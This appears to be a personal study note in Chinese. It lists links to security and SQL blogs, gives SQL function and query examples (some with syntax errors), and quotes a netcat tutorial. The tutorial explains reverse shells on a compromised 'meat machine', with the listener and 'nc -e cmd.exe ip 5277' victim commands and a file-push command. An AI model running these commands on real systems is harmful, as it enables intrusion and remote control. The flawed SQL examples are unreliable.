http://www.freebuf.com/articles/web/156483.html // linux
http://www.cnblogs.com/stayreal/p/3907206.html // to read
http://blog.csdn.net/zsf1235/article/details/50974194 //sqlMap which is very useful
http://blog.csdn.net/earbao/article/details/49633789 //nc 瑞士軍刀 //netcat
http://blog.csdn.net/zzyoucan/article/details/9235685
http://blog.csdn.net/a584226635/article/details/60757344
http://blog.csdn.net/lanzhizhuxia/article/details/7990005 // important ????????????
http://blog.csdn.net/xiong_1234/article/details/68926351 // sql easy query
http://www.cnblogs.com/stayreal/p/3906715.html // sql easy query
https://www.cnblogs.com/stayreal/p/3907206.html // sql diffcult query
sql常用函數
/*
version() database() user() currentuser()
str="abcd"
right(str,1) d
left(str,1) a
substr(str,1,1) b
replace(str,'a','A') Abcd
upper lower length len
floor(1.029) = 1
getdate() //獲取當前時間
month(date) 月 year(date) day(date)
nvl(exp1,exp2) 如果exp1為空,則返回exp2,否則返回exp1
select nvl('','A') from Job // 'A'
nvl2(exp1,exp2,exp2) exp1 != null ? exp2 : exp3
select nvl2('a','A','B')) from Job // 'A'
ascii // 返回與指定字符對應的十進制數 ascii('A') == 65
chr // 給出整數,返回字符 chr(65) = 'A'
concat // 連接字符串 //常見于sql注入??? concat('abcd','1234') = abcd1234
instr(big,small,beginIndex,times) // beginIndex big字符串開始搜索的位置 ,times 第幾次出現
select instr('oractle traning','ra',1,2) instring from Job
instring
9
rpad(str,count,ch) 在字符的右邊補充count個ch 在列的右邊粘貼字符
select lpad(rpad('gao',5,''),1,'') from Job
*gao*****
datediff(year,date,getdate())>10 // 獲取工作年數大于10的
min max count avg
having group by like not like %c%
inner join left join right join full join + table2 + on +table1.xxx = table2.xxx
//查詢員工姓名,所在部門編號和名稱
select ename,EMP.dno,DEPA.name from EMP inner join DEPA on EMP.dno = DEPA.dno
因為dno重復了,所以要寫清楚是哪個表的 EMP.dno
//查詢員工姓名,工作,領導姓名 //帶有重復字段的時候一定要加表名,不然分不清是哪個表的數據
select e1.name,e1.job,e2.name from EMP e1 inner join EMP e2 on e1.mang = e2.no
//查詢員工姓名,工作,領導名字,部門名稱
select e1.name,e1.job,e2.name DEPA.name from EMP e1 DEPA inner join EMP e2 on e1.mang = e2.no where e1.dno = DEPA.no
//查詢每個部門的員工數量
select dno,count(*) from EMP group by dno
//求出每個部分的平均工資 降序排序
select dno,avg(sal) from EMP group by dno order by desc
//求出每個部門工資大于5000的員工數目
select dno,count(*) from EMP where sal>5000 group by dno
//求出每個部門最高工資
select dno,max(sal) from EMP group by dno
//求出平均工資大于2000的部門編號和平均工資
select dno,avg(sal) from EMP group by dno having avg(sal)>2000
//求出非銷售人員外,所有從事同一工作,并且工資大于5000的員工的月工資總和,升序排列 order by //默認升序asc
select jno,sum(sal) from EMP where sal>5000 and job<>'sales' group by jno order by sum(sal)
and or union
//求出工資比7111高,與7112工作相同的員工
select * from EMP where sal>(select sal from EMP where eno=7111) and job=(select job from EMP where eno = 7112)
//求出最低工資的員工姓名,工作,工資
select ename,job,sal from EMP where sal=(select min(sal) from EMP )
*/
https://www.cnblogs.com/SnSpd/p/5926649.html // linux 常用函數 // what to do is to view common func and other
什么叫反彈端口?就是說,當對方中馬后,不用你主動和對方連接,也就是說
不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你
這樣就可以使很多防火墻失效,因為很多防火墻都不檢查出站請求的。
這里這兩個命令結合在一起后,于那兩款木馬可以說有異曲同工之效。為什么?
咳!!聽我給你講啊!!(先交100000000RMB學費)哇,別殺我啊!!)
nc -l -p 5277 (堅聽本地5277端口)
同樣也可以用
nc -l -v -p 5277
運行在本地
然后在遠程機器上,想辦法運行
nc -e cmd.exe ip 5277
(你可別真的打“ip”在肉機上啊)要打,xxx.xxx.xxx.xxx這樣!!
呵呵,看看在本地機器上出現了什么?
這樣就是反彈~~在本地機器上得到了一個SHELL
首先,在遠程機上運行命令:
nc -v -l -p 5277 > c:\pulist.exe
這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277端口
并把接受到的信息數據寫到c:\pulist.exe中
這時候在本地機上運行
nc -v -n ip 5277 < e:\hack\pulist.exe
這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內容,并把這些數據發送到ip的5277端口上
這樣遠程主機就會自動創建一個pulist.exe文件。。
fd[0]:讀管道,fd[1]:寫管道。// 0 stdin 1 stdout 2 stderr